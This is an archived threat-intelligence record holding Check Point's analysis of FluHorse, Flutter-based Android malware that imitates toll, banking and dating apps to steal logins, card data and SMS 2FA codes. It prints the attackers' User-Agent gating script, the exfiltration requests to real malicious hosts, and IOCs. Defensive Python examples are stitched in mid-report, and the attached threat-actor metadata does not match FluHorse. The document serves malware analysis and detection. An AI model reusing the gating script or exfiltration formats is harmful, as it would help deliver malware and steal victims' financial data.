{
	"id": "3da616d2-9c3f-4ae6-99d6-4381bbe2e409",
	"created_at": "2026-04-06T00:21:09.503497Z",
	"updated_at": "2026-04-10T03:31:13.612327Z",
	"deleted_at": null,
	"sha1_hash": "2c6c10bcefc593664e28b5363144ef7a6ea5c4a2",
	"title": "Eastern Asian Android Assault - FluHorse - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 147163,
	"plain_text": "Eastern Asian Android Assault - FluHorse - Check Point Research\r\nBy ramanl\r\nPublished: 2023-05-04 · Archived: 2026-04-05 18:20:58 UTC\r\nResearch by: Alex Shamshur, Sam Handelman, Raman Ladutska, Ohad Mana\r\nIntroduction\r\nIn the latest research conducted by Check Point Research, we describe a newly discovered malware called FluHorse. The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months, making it a persistent, dangerous, and hard-to-spot threat.\r\nImage 1 – One of the malware samples, still not detected on VirusTotal (VT) after 3 months.\r\nCyber-crime operators often get creative in complicating malware analysis. They use tricks like evasion techniques, obfuscation, and long delays before execution – all to sneak past virtual environments and confound researchers. Usually, these tricks are custom implementations that require plenty of effort from their creators. Only in rare cases are malware samples hard to detect and analyze even though they are developed with widely available technologies.\r\nQuite surprisingly, no custom implemented tricks are used inside FluHorse, as the malware authors relied solely on open-source frameworks for the development process. Although some of the applications are created partly with Kotlin, the malicious functionality is implemented with Flutter – and this is where we focused our technical efforts. Flutter is an open-source UI software development kit created by Google. 
It is used to develop cross-platform applications, including Android and iOS mobile apps, from a single codebase. What makes Flutter an appealing choice for malware developers is its use of a custom virtual machine (VM) to support different platforms and its ease of use for creating GUI elements. In addition, analyzing such applications is complicated by the custom VM, which makes this framework a perfect fit for Android phishing attacks, as it turned out to be.\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 1 of 23\r\nIn the article below, we describe the targeted markets in several countries and compare the phishing applications with the legitimate ones (the differences are pretty hard to spot at first glance). We note the available tools for Flutter-application analysis and describe the enhancements that resulted in our open-source contribution: https://github.com/Guardsquare/flutter-re-demo/pull/4. We go through all the pitfalls encountered during our research and provide solutions for bypassing them. Finally, we give an overview of the Command-and-Control (C\u0026C) communication of the malware and dive deeply into the details of the network infrastructure analysis.\r\nMimicked applications\r\nThe malware operators made an eclectic selection of targeted sectors for particular countries, using one mimicked application in each country. One of these mimicked applications is the ETC application, which is used for toll collection in Taiwan. This application has more than 1,000,000 installs on Google Play. 
The company behind ETC is trusted and has a good reputation, which makes such an application very appealing to the attackers as it is sure to attract solvent customers:\r\nFar Eastern Electronic Toll Collection Co., Ltd (FETC) company in Taiwan – The developer of the ETC APK has approximately 16 million transactions per day and more than 6 million users according to the company’s website.\r\nMore cases include a mimicked major transportation application and a major banking application – we do not describe them thoroughly in this article.\r\nAlthough the spheres are different, the malware operators made an effort to carefully mimic all the key interface details to avoid raising any suspicions. We meticulously go through the details of the GUI in different applications later in the report, in the chapter “Phishing scheme”.\r\nThere are also some malicious applications that are connected to the Dating sphere, but we did not find any matching applications that the malware attempts to mimic. In this scenario, the scheme is a bit different: the malware serves as a browser to the phishing site where the victim is supposed to enter the sensitive data. These applications are aimed at Chinese-speaking users.\r\nImage 2 – An icon of the Dating malicious application (translated as “Night Love”).\r\nPhishing scheme\r\nLet’s take a look at how the phishing scheme is implemented in different variants of the applications. It’s interesting to note that the malicious applications do not contain anything except several replicas of windows that let the victim enter data. No additional functions or checks were added. 
This deliberate simplicity leads us to the conclusion that the malware operators did not put much effort into the programming part of their creation… Or they could have made this decision on purpose to further reduce the chances of being detected by security solutions.\r\nWhatever their intention was, the scheme works pretty well. After the victim enters sensitive data, it is exfiltrated to the C\u0026C server. Meanwhile, the malware asks the victim to wait for several minutes while “the data is being processed.” At this step, the SMS interception feature takes the stage and redirects all incoming SMS traffic to the malicious server. When the malware actors use the stolen credentials or credit card data and are asked for a Two-Factor Authentication (2FA) code, that code is intercepted as well. The diagram below summarizes the phishing scheme in graphical form:\r\nImage 3 – How the malware performs phishing attacks.\r\nPlease note that depending on the type of malicious application (targeting Electronic Toll, Banking or Dating users), credentials or credit card numbers may not be required.\r\nInfection chain and targets\r\nBefore the malicious applications are installed on the victims’ devices, they must first be delivered. This is where email lures come in handy. 
We traced infection chains for different types of malicious applications and discovered multiple high-profile entities among the recipients of these emails, including employees of the government sector and large industrial companies.\r\nThe email lures are a good use of social engineering and are aligned with the alleged purpose of the subsequently installed malicious APK: paying tolls.\r\nThis is an example of an email lure with the fetc.net.tw-notice@twfetc.com sender address:\r\nImage 4 – Example of an email sent by malware operators to a government recipient.\r\nThis is the email translation:\r\nDear eTag user\r\nYour one-time toll of 128 yuan expires on January 10, 2023. To avoid a fine of 300 yuan per transaction, please use your mobile phone to click and download the Yuantong Electric Collection App as soon as possible and pay online. https://www.fetc-net[.]com\r\nFar Eastern Electronic Toll Collection Co,Ltd. All Right Reserved.\r\nYuantong Electric has trademarks and copyrights, please do not copy or reprint without authorization.\r\nIf you have any questions, please call Yuantong Customer Service Line 02-77161998.\r\nThanks.\r\nThe malicious fetc-net[.]com domain used by the malware operators is very similar to fetc.net.tw, the official site of the FETC company.\r\nOn this malicious website, the malware actors added an additional protection layer to ensure that only the intended victims are able to download the APK: it is served only if the target’s User-Agent matches the expected one. 
This check is performed via client-side JavaScript:\r\nvar user = navigator.userAgent;\r\nif (user.match(/(iphone os)/i)) {\r\n    console.log(\"isphone\");\r\n} else if (user.match(/ipad/i)) {\r\n    console.log(\"isipad\");\r\n} else if (user.match(/(midp|ucweb|android|windows ce|windows mobile)/i)) {\r\n    window.location.href = \"fetc.apk\";\r\n};\r\nOnly visitors whose User-Agent matches the Android (or legacy mobile) patterns are redirected to fetc.apk; iPhone and iPad visitors get a console message only, and desktop browsers get nothing. A sandbox or analyst fetching the page with a desktop User-Agent therefore never receives the payload.\r\nAfter the malware is installed, it requests SMS permissions:\r\nImage 5 – ETC APK makes a request for SMS permissions.\r\nThe permissions obtained at this step come into play right after the victim enters the sensitive data. And this brings us straight to the next chapter where the attack scheme is described.\r\nMalicious applications: step-by-step GUI analysis\r\nLet’s take a more detailed look at a couple of malicious applications we encountered.\r\nMalicious Electronic Toll Collection APK\r\nThis application contains only 3 windows:\r\nImage 6 – Windows shown in sequence by the malicious ETC APK.\r\nThe first window asks for user credentials, and the second one for the credit card data. All this sensitive data is exfiltrated to the malicious C\u0026C server. 
Next, the third window asks the user to wait for 10 minutes because the “system is busy.” The hope is that the user will close the application, or at least not suspect anything wrong for a reasonable period of time. While the user is lulled into a false sense of security by the “system busy” message, the malware operators perform all their required actions, i.e., intercept all the incoming SMS with 2FA codes and make use of the stolen data.\r\nThe entire GUI of this decoy application looks like a pretty neat copy of the original ETC application for collecting tolls. This is the visual comparison of the malicious and legitimate application entry windows:\r\nImage 7 – Original entry window (left) and the malicious APK entry window (right).\r\nThe original application does not show any fields to log in or enter user credentials. Instead, there is a separate window for this purpose:\r\nImage 8 – Original application login form.\r\nMalicious Dating APK\r\nThe Dating application does not contain any windows. Instead, it effectively functions as a browser leading to the phishing dating site. However, the principle of stealing and processing the data remains the same.\r\nWe do not have screenshots of all the steps interacting with the victim, as at the time of writing this article the malicious servers responsible for processing stolen data from this APK were not active. 
According to the code, only credit card data is stolen, and no credentials are asked for.\r\nThis is how the entry to the dating site looks inside the application:\r\nImage 9 – Window of the phishing dating site shown inside the APK.\r\nThe translation of the shown message follows:\r\nImage 10 – The translation of the message shown on the phishing site.\r\nTechnical details\r\nThe analysis of Flutter-based applications, compared to the analysis of pure Android applications, requires some intermediate steps to reach our goal.\r\nThere are already several good existing guidelines that we used as a basis for our technical analysis:\r\nReverse Engineering Flutter apps by tst.sh\r\nThe Current State \u0026 Future of Reversing Flutter Apps by Guardsquare\r\nWe introduced some technical and quality-of-life improvements to the open-source tools used in those publications.\r\nDigging deep\r\nAs we mentioned in the introduction, Flutter uses a custom virtual environment to support multi-platform development with a single code base. A specific programming language, called Dart, is used for development. Analyzing the Flutter platform code gets a bit easier as it is available as an open-source project, but it can still be a tedious process.\r\nImage 11 – Dart presentation in the Flutter Github page.\r\nLet’s take a look at some of the complications we encountered when dealing with the ad-hoc realm of the Flutter runtime. We dissected an APK with the hash 2811f0426f23a7a3b6a8d8bb7e1bcd79e495026f4dcdc1c2fd218097c98de684.\r\nThe Flutter runtime for ARM uses its own stack pointer register (R15) instead of the built-in stack pointer (SP). 
Which register is used as a stack pointer makes no difference to code execution, and in itself it does not change the reverse-engineering process. However, it makes a big difference for the decompiler: because of the non-standard register usage, wrong and ugly pseudocode is generated.\r\nA good way to start the malware analysis is to determine the protocol of the communication with the C\u0026C servers. This can say a lot about the malicious functionality. There is one string inside that corresponds to the site we saw in the phishing email:\r\nImage 12 – Address of the C\u0026C server among the strings inside the malicious APK.\r\nHowever, when we try to find some references to this string, the analysis fails:\r\nImage 13 – Absence of references to the C\u0026C server string in IDA.\r\nOur goal is to create a reference to this string to locate the code where the C\u0026C communication is performed.\r\nThe articles we mentioned earlier introduce some nice open-source tools to deal with Flutter applications: flutter-re-demo and reFlutter. Their main idea is to use runtime snapshots to create Dart objects and find references to them. The main purpose of reFlutter is to gather the functions’ names, while flutter-re-demo allows us to work with the memory dumps collected during the application execution.\r\nHowever, in addition to memory snapshots, some more runtime information is required. The Flutter runtime uses a heap to create objects and stores the pointers to created objects in a special area called the Object Pool. The pointer to this pool is passed to each method in register X27. We need to find the location of the Object Pool.\r\nflutter-re-demo uses Frida to collect memory dumps and to get the Object Pool address. 
If we run our APK with the dump_flutter_memory.js script available in the flutter-re-demo repository, we see the desired address:\r\nImage 14 – Frida script output with the required addresses.\r\nNow we have all the required elements to start productive reverse engineering.\r\nAfter loading the dumps with map_dart_vm_memory.py and running the script create_dart_objects.py, we can now see at least some of the objects:\r\nImage 15 – Objects created by the script.\r\nWe have to mention here our first addition to the original flutter-re-demo scripts as a part of the open-source contribution.\r\nThere is a script called create_dart_objects.py which intends to create Dart objects. The script works by walking over the Object Pool, parsing records and creating objects. There are a bunch of objects that the script has no information about – for them the script creates the following structures which describe the object format:\r\nstruct DartUnkObjNNN {\r\n    uint8_t is_canonical_and_gc;\r\n    uint8_t size_tag;\r\n    uint16_t cid;\r\n    uint32_t padding;\r\n    uint64_t unk;\r\n}\r\nNNN here is replaced by the “class id” number, like this:\r\nImage 16 – Struct, created by create_dart_objects.py.\r\nDuring the Flutter application reverse-engineering, we noticed that the last field (unk) is frequently used as a pointer. We considered converting this field from a simple QWORD to OFFSET QWORD. This could give us some false positives but could also be very helpful in creating references. 
We therefore decided to change the field type for unk in the structures created by the script. This is our change to the original script:\r\nImage 17 – Our changes to the dart_obj_create.py script.\r\nThe repository we mentioned contains a script for creating references to Dart objects: add_xref_to_dart_objects.py. When you run it, the script goes through the code and creates references to the Dart objects created by the create_dart_objects.py script. After this process, we still have only one reference to the string we are interested in, namely the reference from the Object Pool:\r\nImage 18 – There are no references to the C\u0026C server URL.\r\nOur first thought was: maybe there are no cross-references at all? But no, there are several cross-references present, e.g., this object has references:\r\nImage 19 – A couple of references from functions to objects.\r\nThis is the object which is referenced from the function:\r\nImage 20 – How the reference looks in the function code.\r\nLet’s investigate why we do not see our reference. Walking through the code of add_xref_to_dart_objects.py brings us to the file dart_obj_xref.py. This file also walks through the code, tries to extract references to data based on the register X27, computes the offsets of these references, and finally creates IDA references. Analysis of the code shows that the original script supports two variants of ARM code that access the object:\r\n1:\r\nADD X17, X27, #0x18,LSL#12\r\nLDR X17, [X17,#0xA58]\r\n2:\r\nLDR X24, [X27,#0x20]\r\nIn the first form the pool offset is assembled in two steps: the high part (0x18 shifted left by 12) is added to X27, and the low part (0xA58) is the load displacement, giving pool offset 0x18A58. In the second form the offset (0x20) is encoded directly in the load.\r\nDoes the code use some other instructions to reference the register X27? Let’s check. 
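The two access forms above, and the check for forms a script does not yet handle, as an added example. This is not the flutter-re-demo code but a stand-alone model of the same idea: recognise the supported X27 constructions, compute the pool offset, tag the lines the way the modified script does, and filter out what is left. The listing it runs on is constructed; it contains the two supported forms plus two deliberately unsupported ones.

```python
# Added example, not the flutter-re-demo code: a stand-alone model of how an
# xref script recognises the two object-pool access forms above, and of the
# grep filter that exposes the forms it does not yet support. Lines are bare
# instruction text as IDA prints them; addresses and labels are left out.
POOL_REG = 'X27'                    # object-pool pointer register in Dart ARM64 code
NOTE = 'reference to Dart object'   # comment text the grep filter keys on


def parse_insn(line):
    '''Split one listing line into (mnemonic, operands), dropping ; comments.'''
    text = line.split(';', 1)[0].strip()
    if not text:
        return '', []
    mnem, _, rest = text.partition(' ')
    ops = [op.strip().strip('[]!').upper() for op in rest.split(',') if op.strip()]
    return mnem.upper(), ops


def imm(tok):
    '''#0x18 -> 24, LSL#12 -> 12 (the part after the #).'''
    return int(tok.split('#', 1)[1], 0)


def find_pool_refs(listing):
    '''Return (refs, unsupported).

    refs: list of ((line indices,), pool offset) for each recognised access:
      form 1: ADD Xd, X27, #hi, LSL#12 ; LDR Xr, [Xd, #lo]  -> (hi << 12) + lo
      form 2: LDR Xr, [X27, #off]                          -> off
    unsupported: indices of other lines that touch X27 and still need handling.
    '''
    refs, unsupported = [], []
    i = 0
    while i < len(listing):
        mnem, ops = parse_insn(listing[i])
        if (mnem == 'ADD' and len(ops) == 4 and ops[1] == POOL_REG
                and ops[3].startswith('LSL#') and i + 1 < len(listing)):
            nmnem, nops = parse_insn(listing[i + 1])
            if nmnem == 'LDR' and len(nops) == 3 and nops[1] == ops[0]:
                offset = (imm(ops[2]) << imm(ops[3])) + imm(nops[2])
                refs.append(((i, i + 1), offset))
                i += 2
                continue
        if mnem == 'LDR' and len(ops) == 3 and ops[1] == POOL_REG:
            refs.append(((i,), imm(ops[2])))
        elif POOL_REG in ops:
            unsupported.append(i)
        i += 1
    return refs, unsupported


def annotate(listing):
    '''Append the comment the modified script writes to every line of a recognised access.'''
    out = list(listing)
    refs, _ = find_pool_refs(listing)
    for lines, offset in refs:
        for idx in lines:
            out[idx] = f'{out[idx]} ; {NOTE} at pool+0x{offset:X}'
    return out


def unsupported_x27_lines(annotated):
    '''Same filter as: grep X27 libapp.lst | grep --invert-match <NOTE>.'''
    return [ln for ln in annotated if POOL_REG in ln and NOTE not in ln]


# Constructed listing: the two supported forms, then two forms the model does
# not handle (a plain ADD without LSL, and a pair load). Not from the real sample.
SAMPLE_LISTING = [
    'STP X29, X30, [SP,#-0x10]!',
    'ADD X17, X27, #0x18,LSL#12',
    'LDR X17, [X17,#0xA58]',
    'LDR X24, [X27,#0x20]',
    'ADD X16, X27, #0x40',
    'LDR X16, [X16]',
    'LDP X0, X1, [X27,#0x30]',
    'BLR X17',
]

if __name__ == '__main__':
    for line in unsupported_x27_lines(annotate(SAMPLE_LISTING)):
        print('unsupported:', line)
```

Fed a real listing exported from IDA, the lines that unsupported_x27_lines leaves over are exactly the constructions to add to the pattern matcher, one at a time, until the string of interest finally gets its reference.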
For convenience, let’s modify the script and add a comment to each instruction processed with X27:\r\nImage 21 – dart_obj_xref.py modification.\r\nWe can then inspect the disassembler listing for constructions involving X27 which have no “reference to Dart object” comment attached. We can partially automate this by generating a listing file with IDA and grepping it like this:\r\ngrep \"X27\" libapp.lst | grep --invert-match \"reference to Dart object\"\r\nFirst, grep finds all lines containing X27. Then those lines go through the second grep command, which prints only the lines that contain no reference to a Dart object. Therefore, we see only unsupported X27 references.\r\nWhen we detect an unsupported X27 construction, we add code to support it in the script. After several iterations, we finally get our references to the C\u0026C address string:\r\nImage 22 – References to the C\u0026C address string.\r\nLet’s inspect these functions starting with sub_70FD611C0C. 
A brief overview shows that this function does something with the HTTP POST method and the path “/addcontent3” when communicating with the C\u0026C server:\r\nImage 23 – Pseudo-code of the sub_70FD611C0C function.\r\nThere is also a reference to this function from another Dart object:\r\nImage 24 – Reference to a Dart object.\r\nAs we go through the references, we finally come to the function with the following code:\r\nImage 25 – Code responsible for listening to all the incoming SMS.\r\nThis function installs a listener for all incoming SMS messages.\r\nTo be absolutely sure our static analysis was correct, we checked this function on a real device at runtime. Indeed, we caught a POST request to the C\u0026C server.\r\nThis is an example of a C\u0026C request after the device received an SMS with the text “Fdsa”:\r\nPOST /addcontent3\r\nuser-agent: Dart/2.16 (dart:io)\r\ncontent-type: application/x-www-form-urlencoded; charset=utf-8\r\naccept-encoding: gzip\r\ncontent-length: 12\r\nBody: ids=\u0026c4=Fdsa\r\nTherefore, the function sub_70FD611C0C is used for exfiltrating SMS messages to the C\u0026C server.\r\nThe functions sub_70FD61EBC4 and sub_70FD61EECC look very similar to the already analyzed sub_70FD611C0C except for the kind of exfiltrated data and the server path. These functions use the paths “/addcontent” and “/addcontent2”, respectively, and are used to exfiltrate the victim’s credentials and payment card information.\r\nThere are no traces of server communication in the DEX code, so we can assume all communication is located in the Flutter part of the application. 
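Since the Flutter side does all the talking, the three POST paths and the Dart/2.16 (dart:io) User-Agent are what a network sensor or proxy log actually sees. Below is an added example, not Check Point's code, that turns the protocol into detection logic: it classifies captured requests by path, decodes the name=value bodies (and the JSON body the web Dating decoy uses, described in the C&C communication section that follows), and records whether the request came from the dart:io client and carried the always-empty ids field. Field meanings follow the endpoint table in that section; the captured requests are constructed, except for the /addcontent3 body shown above.

```python
# Added example, not Check Point's code: classify FluHorse-style exfiltration
# requests from captured HTTP request data. Endpoint and field names follow the
# C&C protocol description in this report; the captured requests are constructed
# (the /addcontent3 body is the one shown in the report, the rest are made up).
import json
from urllib.parse import parse_qs

# path -> (what is exfiltrated, form field -> meaning)
ENDPOINTS = {
    '/addcontent':  ('credentials', {'c1': 'login', 'c2': 'password'}),
    '/addcontent2': ('card', {'c3': 'card_number', 'c33': 'expiry', 'c333': 'cvc'}),
    '/addcontent3': ('sms', {'c4': 'sms_body'}),
}
# JSON keys used by the web (Dating) variant of /addcontent2
WEB_CARD_KEYS = {'cardNumber': 'card_number', 'name': 'name',
                 'expiryDate': 'expiry', 'cvvCode': 'cvc'}


def classify(req):
    '''Return an exfiltration event for one captured request, or None.

    req is a dict with method, host, path, user_agent, content_type and body
    (the shape a proxy or HTTP log would give you).
    '''
    if req.get('method') != 'POST':
        return None
    endpoint = ENDPOINTS.get(req.get('path'))
    if endpoint is None:
        return None
    kind, form_fields = endpoint
    body = req.get('body', '')
    if req.get('content_type', '').startswith('application/json'):
        # Web (Dating) variant: same endpoint, JSON body instead of name=value
        data = json.loads(body)
        keys = WEB_CARD_KEYS if req['path'] == '/addcontent2' else {}
        fields = {keys.get(k, k): v for k, v in data.items()}
        ids_marker = False
    else:
        qs = parse_qs(body, keep_blank_values=True)
        fields = {name: qs[field][0] for field, name in form_fields.items() if field in qs}
        # /addcontent2 and /addcontent3 always carry an empty ids= field
        ids_marker = qs.get('ids') == ['']
    return {
        'host': req.get('host'),
        'path': req['path'],
        'kind': kind,
        'fields': fields,
        # the Flutter sample talks HTTP through the dart:io client, not a browser UA
        'dart_client': req.get('user_agent', '').startswith('Dart/'),
        'ids_marker': ids_marker,
    }


def scan(requests):
    '''Run classify over a capture and keep only the matching events.'''
    return [e for e in (classify(r) for r in requests) if e is not None]


# Constructed capture: one real-looking SMS leak (body from the report), one
# made-up card leak, one web-variant JSON card leak, and a non-matching GET.
SAMPLE_REQUESTS = [
    {'method': 'POST', 'host': 'api.fetc-net.com', 'path': '/addcontent3',
     'user_agent': 'Dart/2.16 (dart:io)',
     'content_type': 'application/x-www-form-urlencoded; charset=utf-8',
     'body': 'ids=&c4=Fdsa'},
    {'method': 'POST', 'host': 'api.fetc-net.com', 'path': '/addcontent2',
     'user_agent': 'Dart/2.16 (dart:io)',
     'content_type': 'application/x-www-form-urlencoded; charset=utf-8',
     'body': 'ids=&c3=4111111111111111&c33=11%2F27&c333=150'},
    {'method': 'POST', 'host': 'jp.yelove.xyz', 'path': '/addcontent2',
     'user_agent': 'Mozilla/5.0 (Linux; Android 12)',
     'content_type': 'application/json',
     'body': json.dumps({'cardNumber': '1234253456345', 'name': 'sfsdfgfde dg sdg',
                         'expiryDate': '11/27', 'cvvCode': '150'})},
    {'method': 'GET', 'host': 'api.fetc-net.com', 'path': '/addcontent', 'body': ''},
]

if __name__ == '__main__':
    for event in scan(SAMPLE_REQUESTS):
        print(event)
```

The path names alone are generic enough to collide with benign traffic, so the event keeps the two corroborating signals separately: a Dart/ User-Agent posting form data is unusual for a legitimate banking or toll app, and the empty ids field is a fixed quirk of this protocol. Alerting on kind plus either signal, and escalating when both are present, is a reasonable first rule.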
After analyzing all the functions related to the C\u0026C server communication, we can describe the network protocol.\r\nC\u0026C communication\r\nThe C\u0026C protocol only sends data from the compromised device to the server. There are no commands in the opposite direction, i.e., from the server to the compromised device. HTTPS is used to transfer the data, and several endpoints are used.\r\nThis is the description of every endpoint we encountered in the analyzed samples:\r\nEndpoint | Description | Method used | Fields\r\n/addcontent | Used to exfiltrate the victims’ credentials. | POST | c1 – user login; c2 – user password\r\n/addcontent2 | Used to exfiltrate credit card data to the server. | POST | ids – always empty; c3 – card number; c33 – expiration date; c333 – CVC code\r\n/addcontent3 | Used to exfiltrate SMS messages intercepted by the malicious application. | POST | ids – always empty; c4 – SMS message body\r\nWeb variants of the decoys used for the Dating malicious applications use a very similar protocol. This is an example of exfiltrating credit card data:\r\nURL: https://jp.yelove.xyz/addcontent2\r\nMETHOD: POST\r\nBODY: {\"cardNumber\":\"1234253456345\",\"name\":\"sfsdfgfde dg sdg\",\"expiryDate\":\"11/27\",\"cvvCode\":\"150\"}\r\nThe only difference is the body format: the Web version uses JSON instead of the “name=value” format.\r\nContribution summary\r\nThis is a summary of our open-source contribution to the flutter-re-demo project:\r\n1. Added parsing of some previously unsupported constructions for accessing Dart objects.\r\n2. Added saving key information during dynamic analysis and using this information in IDA scripts.\r\n3. 
One field for the unknown Dart object struct is set to an offset so that it can bring more references to Dart objects.\r\nConclusion\r\nIdealists invent new technologies hoping for the progress of humankind. Realists adapt these inventions to day-to-day needs. Evil minds abuse them in often unforeseen and unpredictable ways to make the most for themselves. This timeless truth got an unexpected implementation in the abuse of modern development frameworks by Android malware developers. Such frameworks can be used as a double-edged sword, as we described above. The malware operators pursued a direct approach to stealing victims’ sensitive data without distractions to other components.\r\nThe technical implementation of these malicious samples consists of several layers. As the functional part is relatively simple, we can conclude that the malware developers did not put much effort into the programming, instead relying on Flutter as a development platform. The developers’ main focus is on the GUI. This approach allowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using Flutter is that its hard-to-analyze nature renders many contemporary security solutions worthless.\r\nWe traced FluHorse activity back to May 2022. Our analysis shows that these campaigns remain an ongoing threat as new infrastructure nodes and malicious applications appear each month.\r\nAs the human factor remains important in malware attacks, Check Point Research recommends the following for mobile device users:\r\nDo not open links in unexpected emails from unknown senders.\r\nInstall applications only from trusted and verified publishers.\r\nIf you see an application from a new publisher, search for analogs from a trusted one.\r\nCheck Point’s Harmony Mobile prevents malware from infiltrating mobile devices by detecting and blocking the download of malicious apps in real-time. 
Harmony Mobile’s unique network security infrastructure – On-device Network Protection – allows you to stay ahead of emerging threats by extending Check Point’s industry-leading network security technologies to mobile devices.\r\nRelevant Check Point protections:\r\nStealer.Android.FluHorse.TC.*\r\nFluHorse.TC.*\r\nUpdates and edits\r\n2023-05-11 – Edited to remove sensitive research data\r\nIOCs\r\nSamples\r\nHash | Description\r\n0a577ee60ca676e49add6f266a1ee8ba5434290fa8954cc35f87546046008388 | Dating app\r\n2e18c919ad53a66622e404a96cbde15f237a7bfafed1c0896b6b7e289bc230d6 | Major banking app\r\n416e22d6b85d6633d1da000058efb3cd597b8b7df5d77a6c3456464d65a775b3 | Toll app\r\n74008170fc5de4d40bcc97b8e2c6fbdb01889805c6ca456fd08134881cad0d2c | Dating app\r\n8b591b5488dab8adb485ea55197148d6b39715da562537c7d8b1a79cd3639510 | Major banking app\r\n910707dd041c13f3379115bdf93bb4984ac20b9ecafd59f93e5089ab3a141e67 | Toll app\r\n9220752302e2bca0002ea701c772b2f2306831711b1c323157ef2573f176821a | Major banking app\r\nd78fa2c475ea08f90ef6b189d2a3fddc9ead86ae43df272e9083f92f7a47aabe | Major banking app\r\nd8a777b050ba27eeb41c0035f3477882d7eafc56edfcbe1e8cef05a7e85c8b9e | Delivery\r\nde86b0fbbd343f3fc5bb6c19a067a6f063b423132e19c6004c7b696ea1fe0c7d | Major banking app\r\n2811f0426f23a7a3b6a8d8bb7e1bcd79e495026f4dcdc1c2fd218097c98de684 | Toll app\r\n659f69d660179d0e8a5f4c2850c51a05529e0ef06ac739ca6f61fe470917ee96 | Toll app\r\ne54a2581545477882a1b7c1f9cbb74fb2aa97fcf1ee8b097c8085302ed6fbf36 | Major transportation app\r\nDomains\r\nDomain | Decoy relation\r\ninfo1.yelove.xyz | Dating\r\njp.yelove.xyz | Dating\r\nh5.yelove.xyz | Dating\r\napi.vpbankem.com | Bank\r\napi.fetctw.xyz | Toll\r\napi.fetc-net.com | Toll\r\napi.usadmin-3.top | Toll and major transportation app\r\nwww.pcdstl.com | Toll\r\nh5.spusp.xyz | Dating\r\nOnline resources\r\nOpen-source projects\r\n1. https://github.com/Guardsquare/flutter-re-demo // flutter-re-demo – Open-source project for analysis of Flutter-based applications\r\n2. https://github.com/ptswarm/reFlutter // reFlutter – Open-source project for analysis of Flutter-based applications\r\n3. https://github.com/frida // Frida – Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers\r\nTechnical analysis articles\r\n1. https://blog.tst.sh/reverse-engineering-flutter-apps-part-1 // Reverse engineering Flutter apps (Part 1)\r\n2. https://www.guardsquare.com/blog/current-state-and-future-of-reversing-flutter-apps // The Current State \u0026 Future of Reversing Flutter™ Apps\r\nContribution\r\nhttps://github.com/Guardsquare/flutter-re-demo/pull/4 // Our contribution to flutter-re-demo\r\nSource: https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/"
	],
	"report_names": [
		"eastern-asian-android-assault-fluhorse"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434869,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.pdf",
		"text": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.txt",
		"img": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.jpg"
	}
}